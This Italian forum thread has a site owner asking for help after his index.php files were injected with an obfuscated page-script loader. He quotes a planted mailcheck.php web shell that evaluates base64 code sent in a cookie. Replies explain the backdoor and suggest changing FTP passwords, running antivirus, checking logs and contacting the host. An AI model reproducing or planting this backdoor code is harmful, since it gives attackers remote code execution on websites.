Index.php Virato sul sito

[Baloo]

Salve a tutti,

Ho un sito su Ar*ba e venerdì scorso tutti gli index.php del sito sono stati virati con un cavallo di troia.
Hanno inserito all'inizio del mio codice un pezzo (peso 6kb) che inizia così:

Codice PHP:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14)Z2529;Z2522;Z22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ252...

Inoltre nella mia root hanno inserito un file completamente nuovo dal nome "mailcheck.php"
Al suo interno il codice è:

Codice PHP:

<?php    eval(base64_decode('aWYoaXNzZXQoJF9DT09L SUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZ TY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9')); echo "checking email...";

Qualcuno sa dirmi che tipo di attacco è, e se dipende da un mio errore di gestione (permessi?) o di codice o se è colpa del server?

Grazie
BALOO

[bubi1]

quello in php prende qualsiasi codice gli venga passato in un cookie e lo esegue.

Fossi in te, cambiere al volo le password ftp e controllerei il pc personale con un buon antivirus.
Ultimamente in 90% dei casi, il motivo e' un trojan che si prende le pass salvate su filezilla/simili e le manda al malfattore. Poi ovviamente esiste anche la possibilita' che i tuoi script siano bucati - dai un occhiata ai log di apache se vedi chiamate strane.

[Virus_101]

Potrebbe essere un porblema di ftp, se hai password non troppo complesse potrebbero essere entrati da li.

Potrebbe altresi' essere un problema se hai procedure php che consentono di leggere/ scrivere su file.

Mi pare pero' che forse il problema potrebbe essere direttamente connesso al pc che usi per collegarti in ftp, se tale programma e' stato infettato da qualche virus puo' succedere che venga sfruttatto l'accesso che fai tramite il tuo client ftp per scaricare il file index modificarlo e sositituirlo a quello esistente.

Io ti consiglio di fare cosi :

1- esegui scansione con almeno un paio di antivirus e anti spyware/malware sul tuo pc.
2- invia un ticket ad aruba comunicando il problema.

Attendi i risultati e posta.

[Baloo]

Vi ringrazio delle risposte.

Non credo che siano entrati dal mio pc (questa sera farò girare l'antivirus), sono più propenso a credere che abbiano crakkato la mia password (che provvederò a cambiare).
Ho provveduto ad aprire un tiket su aruba, sentiamo cosa mi rispondono.

Comunque sapete spiegarmi il funzionamento di quel codice aggiunto?

grazie
BALOO

[bubi1]

Comunque sapete spiegarmi il funzionamento di quel codice aggiunto?

quello in php prende qualsiasi codice gli venga passato in un cookie e lo esegue.